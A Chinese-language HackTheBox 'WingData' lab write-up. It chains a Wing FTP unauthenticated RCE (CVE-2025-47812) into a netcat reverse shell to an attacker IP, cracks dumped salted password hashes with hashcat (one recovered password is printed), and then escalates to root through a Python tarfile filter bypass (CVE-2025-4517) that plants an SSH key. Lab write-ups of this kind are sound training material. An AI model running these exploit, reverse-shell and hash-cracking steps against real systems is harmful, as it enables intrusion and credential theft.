HTB-WingData

HackTheBox
, , , ,

Nmap

1
2
3
4
5
6
7
8
┌──(kali👻Thr2on1)-[~/Websec/HTB/WingData]
└─$ sudo nmap -p- --min-rate 5000 -oA nmapscans/ports 10.129.239.109
Nmap scan report for 10.129.239.109
Host is up (0.099s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

只有两个端口

CVE-2025-47812

查看web应用,在首页可以跳转到ftp.wingdata.htb,发现是Wing FTP Server,版本为v7.4.3。Google搜索相关漏洞,该服务器存在CVE-2025-47812(漏洞版本:version<7.4.4)未授权RCE。可以在github上搜索相关的exp利用(https://github.com/4m3rr0r/CVE-2025-47812-poc)

1
2
3
4
5
6
7
8
9
10
11
┌──(kali👻Thr2on1)-[~/Websec/HTB/WingData/CVE-2025-47812-poc]
└─$ python3 CVE-2025-47812.py -u http://ftp.wingdata.htb/ -c "id"         

[*] Testing target: http://ftp.wingdata.htb/
[+] Sending POST request to http://ftp.wingdata.htb//loginok.html with command: 'id' and username: 'anonymous'
[+] UID extracted: c9495b9aea10e5a08fb75c2d5de4aabbf528764d624db129b32c21fbca0cb8d6
[+] Sending GET request to http://ftp.wingdata.htb//dir.html with UID: c9495b9aea10e5a08fb75c2d5de4aabbf528764d624db129b32c21fbca0cb8d6

--- Command Output ---                                                                                                                                                                          
uid=1000(wingftp) gid=1000(wingftp) groups=1000(wingftp),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev)
----------------------

可以看到成功执行了id命令,构造payload进行反弹shell

1
nc 10.10.16.9 4444 -e /bin/sh

靶机上有python环境,可以提升一下shell的交互性

1
python3 -c 'import pty;pty.spawn("/bin/bash")'

Foothold

1
2
3
4
5
6
listening on [any] 4444 ...
connect to [10.10.16.9] from (UNKNOWN) [10.129.96.80] 57328
python3 -c 'import pty;pty.spawn("/bin/bash")'
wingftp@wingdata:/opt/wftpserver$ id
id
uid=1000(wingftp) gid=1000(wingftp) groups=1000(wingftp),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev)

弹到的shell是wingftp用户,查看/etc/passwd可以发现存在wacky用户。先在靶机上收集信息,

1
2
3
4
5
6
7
8
9
10
wingftp@wingdata:/opt/wftpserver/Data/1/users$ ls -al
ls -al
total 28
drwxr-x--- 2 wingftp wingftp 4096 Feb 15 22:00 .
drwxr-x--- 4 wingftp wingftp 4096 Feb  9 08:19 ..
-rwxr-x--- 1 wingftp wingftp 2842 Feb 15 22:00 anonymous.xml
-rwxr-x--- 1 wingftp wingftp 2846 Nov  2 11:13 john.xml
-rw-rw-rw- 1 wingftp wingftp 2847 Nov  2 12:05 maria.xml
-rw-rw-rw- 1 wingftp wingftp 2847 Nov  2 12:02 steve.xml
-rw-rw-rw- 1 wingftp wingftp 2856 Nov  2 12:28 wacky.xml

Data/1/users目录下有很多用户的配置文件,其中有用户的hash,全都保存下来准备爆破密码。查看wftpserver的官方文档,从中得知密码加密方式,且在进行sha256的时候可能存在盐值。

Data/1目录下的settings.xml文件中可以找到盐值相关的配置。

1
2
<EnablePasswordSalting>1</EnablePasswordSalting>                                                         
<SaltingString>WingFTP</SaltingString>

使用hashcat进行爆破

pass.hash

1
2
3
4
5
32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca:WingFTP
5916c7481fa2f20bd86f4bdb900f0342359ec19a77b7e3ae118f3b5d0d3334ca:WingFTP
a70221f33a51dca76dfd46c17ab17116a97823caf40aeecfbc611cae47421b03:WingFTP
c1f14672feec3bba27231048271fcdcddeb9d75ef79f6889139aa78c9d398f10:WingFTP
d67f86152e5c4df1b0ac4a18d3ca4a89c1b12e6b748ed71d01aeb92341927bca:WingFTP
1
2
3
┌──(kali👻Thr2on1)-[~/Websec/HTB/WingData/CVE-2025-47812-poc]
└─$ hashcat -m 1410 -a 0 pass.hash /usr/share/wordlists/rockyou.txt                
32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca:WingFTP:!#7Blushing^*Bride5

拿到密码可以通过ssh登陆到wacky用户

CVE-2025-4517 to ROOT

sudo -l查看用户可用的sudo命令

1
2
3
4
5
6
wacky@wingdata:~$ sudo -l
Matching Defaults entries for wacky on wingdata:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User wacky may run the following commands on wingdata:
    (root) NOPASSWD: /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py *

发现wacky可以运行/opt/backup_clients/restore_backup_clients.pypython脚本,下载python脚本进行审计。python脚本的功能是将/opt/backup_clients/backups目录下的tar包解压到/opt/backup_clients/restored_backups目录下。

漏洞代码:

1
2
3
4
5
6
7
try:
        with tarfile.open(backup_path, "r") as tar:
            tar.extractall(path=staging_dir, filter="data")
        print(f"[+] Extraction completed in {staging_dir}")
    except (tarfile.TarError, OSError, Exception) as e:
        print(f"[!] Error during extraction: {e}", file=sys.stderr)
        sys.exit(2)

这里存在CVE-2025-4517漏洞,即tarfile.extractall()或tarFile.extract()在配置filter=data或filter=tar时,可以利用RealPath溢出绕过filter的限制将tar解压到其他文件中。因此我们可以将自己的公钥写入到/root/.ssh/authorized_keys中,然后通过ssh登陆到root用户。在github上搜索exp生成恶意的tar包(https://github.com/DesertDemons/CVE-2025-4138-4517-POC)

0x01 生成ssh密钥对

1
ssh-keygen -t ed25519 -f id_ed25519 -N ""

会生成id_ed25519.pubid_ed25519公钥和私钥文件

0x02 生成tar包

1
python3 exploit.py --tar-out backup_1002.tar --target /root/.ssh/authorized_keys --payload id_ed25519.pub --mode 0600

0x03 上传至靶机利用

可以通过多种方式上传至靶机。

1
2
3
4
wacky@wingdata:/opt/backup_clients/backups$ sudo /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py -b backup_1002.tar -r restore_pwn
[+] Backup: backup_1002.tar
[+] Staging directory: /opt/backup_clients/restored_backups/restore_pwn
[+] Extraction completed in /opt/backup_clients/restored_backups/restore_pwn

0x04 ssh登录

1
2
3
ssh -i id_ed25519 root@wingdata.htb
root@wingdata:~# id
uid=0(root) gid=0(root) groups=0(root)